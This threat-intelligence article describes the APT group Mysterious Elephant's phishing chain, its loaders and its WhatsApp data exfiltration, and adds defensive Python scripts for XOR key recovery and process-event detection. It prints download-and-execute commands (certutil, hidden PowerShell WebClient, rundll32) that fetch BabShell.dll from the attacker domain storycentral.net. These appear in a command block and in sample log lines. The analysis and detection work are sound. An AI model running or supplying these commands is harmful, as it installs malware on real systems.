In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.
First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.
Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.
Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.
Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.
As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.
Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.
These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.
By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.
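The article says the exfiltrators XOR-obfuscate stolen documents, images and archives before sending them over HTTP. When an analyst recovers such a blob from a proxy log or packet capture, the file type itself gives a known-plaintext foothold: the first bytes of a ZIP, PDF, JPEG or PNG are fixed, so XORing them against the captured prefix reveals the key if it is a single repeating byte. The script below is an added example, not Kaspersky/Securelist tooling; it assumes a single-byte key (the article does not state the key length) and returns nothing rather than guessing when the prefix is inconsistent with every known signature. The sample blob is constructed.

```python
"""Recover a single-byte XOR key from a captured exfil blob via file signatures.

Added example (not the Securelist/Kaspersky tooling described in the article).
Assumption: the obfuscation is a single repeating XOR byte. A multi-byte key
would need a key-length search first and is reported here as "no match".
"""

# Signatures of the file types the article says are exfiltrated
# (documents, images, archives).
MAGICS = {
    b"PK\x03\x04": "zip/docx/xlsx archive",
    b"%PDF-": "PDF document",
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"RIFF": "RIFF container (WebP/WAV)",
}


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to the whole buffer (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def recover(blob: bytes):
    """Return (key, description) if the blob prefix XORs to a known signature
    under one consistent byte, otherwise None."""
    for magic, desc in MAGICS.items():
        if len(blob) < len(magic):
            continue
        # Each prefix position yields a candidate key; a genuine single-byte
        # key makes them all agree.
        candidates = {c ^ m for c, m in zip(blob, magic)}
        if len(candidates) == 1:
            return candidates.pop(), desc
    return None


def decode(blob: bytes):
    """Convenience wrapper: return the recovered plaintext or None."""
    hit = recover(blob)
    if hit is None:
        return None
    key, _ = hit
    return xor_bytes(blob, key)


if __name__ == "__main__":
    # Constructed sample: a ZIP-style header plus a file name, obfuscated with 0x5A.
    sample = b"PK\x03\x04\x14\x00\x00\x00report.docx"
    captured = xor_bytes(sample, 0x5A)
    print(recover(captured))          # (90, 'zip/docx/xlsx archive')
    print(decode(captured) == sample)  # True
```

The check is deliberately conservative: a prefix that matches no signature under any single byte yields `None`, which is the cue to fall back to frequency analysis or a key-length search rather than trust a heuristic decode.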
# Download and execute BabShell payload
certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPoint
Infection Mechanism
The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.
When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.
This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.
Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.
After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.
This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.
By avoiding disk writes, MemLoader HidenDesk leaves far fewer forensic artifacts, allowing Mysterious Elephant to move laterally and harvest target data undetected.
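Every stage of the chain described above leaves a process-creation record even when the payload never touches disk: the Equation Editor spawning a child, PowerShell launched hidden with a WebClient download, certutil used as a download cradle, and rundll32 loading a DLL from a user-writable path. The script below is an added example of turning those observations into checks; it is not a Kaspersky/Securelist rule. The pipe-separated log format and the sample lines are constructed for the illustration and stand in for Sysmon Event ID 1 or EDR process telemetry.

```python
"""Flag the infection-chain process events described in the article.

Added example, not a vendor detection rule. Log format (parent | image |
command line) and the sample events are constructed; in practice the same
predicates run over Sysmon Event ID 1 or EDR process-creation telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> Event:
    parent, image, cmdline = (f.strip() for f in line.split("|", 2))
    return Event(parent, image, cmdline)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Each rule maps to one behaviour the article describes.
RULES = [
    # Equation Editor (CVE-2017-11882 target) has no business spawning children.
    ("equation-editor-child",
     lambda e: basename(e.parent) == "eqnedt32.exe"),
    # Hidden PowerShell pulling a payload with .NET WebClient.
    ("powershell-hidden-download",
     lambda e: basename(e.image) == "powershell.exe"
     and re.search(r"-(w|windowstyle)\s+hidden", e.cmdline, re.I)
     and re.search(r"webclient|downloadstring|downloadfile", e.cmdline, re.I)),
    # certutil -urlcache -f <url> as a download cradle.
    ("certutil-url-cache",
     lambda e: basename(e.image) == "certutil.exe"
     and re.search(r"-urlcache", e.cmdline, re.I)
     and re.search(r"https?://", e.cmdline, re.I)),
    # rundll32 loading a DLL from a user-writable location.
    ("rundll32-user-writable-dll",
     lambda e: basename(e.image) == "rundll32.exe"
     and re.search(r"(\\users\\|\\temp\\|\\appdata\\)[^\s,]+\.dll", e.cmdline, re.I)),
]


def scan(lines):
    """Return a list of (rule name, command line) for every rule each event trips."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        for name, predicate in RULES:
            if predicate(ev):
                findings.append((name, ev.cmdline))
    return findings


# Constructed sample telemetry: one benign Word launch, the chain from the
# article (using its storycentral.net URL and BabShell.dll name), and one
# benign rundll32 call that must not fire.
SAMPLE_LOG = r"""
C:\Windows\explorer.exe | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | "WINWORD.EXE" C:\Users\alice\Downloads\invitation.rtf
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://storycentral.net/BabShell.dll','C:\Users\alice\AppData\Local\Temp\BabShell.dll')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\certutil.exe | certutil -urlcache -f http://storycentral.net/BabShell.dll BabShell.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\rundll32.exe | rundll32.exe C:\Users\alice\AppData\Local\Temp\BabShell.dll,EntryPoint
C:\Windows\explorer.exe | C:\Windows\System32\rundll32.exe | rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
"""

if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_LOG.splitlines()):
        print(f"[{name}] {cmd}")
```

The Equation Editor rule is the highest-signal one: EQNEDT32.EXE spawning any child is anomalous regardless of what the child runs, so it catches the document stage even when later stages change their download tooling.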
The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.
Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.